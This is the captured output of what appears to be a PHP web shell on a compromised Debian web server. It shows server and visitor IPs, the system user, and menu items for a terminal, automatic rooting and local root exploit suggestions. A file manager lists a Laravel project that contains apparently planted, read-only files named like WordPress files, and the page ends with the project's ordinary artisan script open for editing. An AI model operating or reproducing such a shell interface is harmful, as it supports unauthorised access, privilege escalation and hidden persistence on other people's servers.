Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.173
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
.scripts
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
app
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
bootstrap
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
config
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
database
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
node_modules
[ DIR ]
drwxr-xr-x
2022-04-21 14:27
public
[ DIR ]
drwxrwxrwx
2022-04-21 13:49
resources
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
routes
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
storage
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
tests
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
vendor
[ DIR ]
drwxrwxrwx
2022-04-21 14:24
.DS_Store
10
KB
-rwxrwxrwx
2022-04-21 13:43
.editorconfig
220
B
-rwxrwxrwx
2022-04-21 13:43
.env
1.02
KB
-rwxrwxrwx
2022-04-21 13:47
.env.example
751
B
-rwxrwxrwx
2022-04-21 13:43
.gitattributes
111
B
-rwxrwxrwx
2022-04-21 13:43
.gitignore
198
B
-rwxrwxrwx
2022-04-21 13:43
.htaccess
197
B
-r--r--r--
2025-10-25 04:45
.styleci.yml
174
B
-rwxrwxrwx
2022-04-21 13:43
artisan
1.65
KB
-rwxrwxrwx
2022-04-21 13:43
composer.json
2.11
KB
-rwxrwxrwx
2022-04-21 17:40
package.json
1.59
KB
-rwxrwxrwx
2022-04-21 13:43
phpstan.neon
154
B
-rwxrwxrwx
2022-04-21 13:43
phpunit.xml
1.11
KB
-rwxrwxrwx
2022-04-21 13:43
readme.md
535
B
-rwxrwxrwx
2022-04-21 13:43
server.php
563
B
-rwxrwxrwx
2022-04-21 13:43
webpack.mix.js
549
B
-rwxrwxrwx
2022-04-21 13:43
wp-blog-header.php
2.73
KB
-r--r--r--
2025-10-25 04:45
wp-cron.php
2.73
KB
-rw-r--r--
2025-10-25 04:45
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);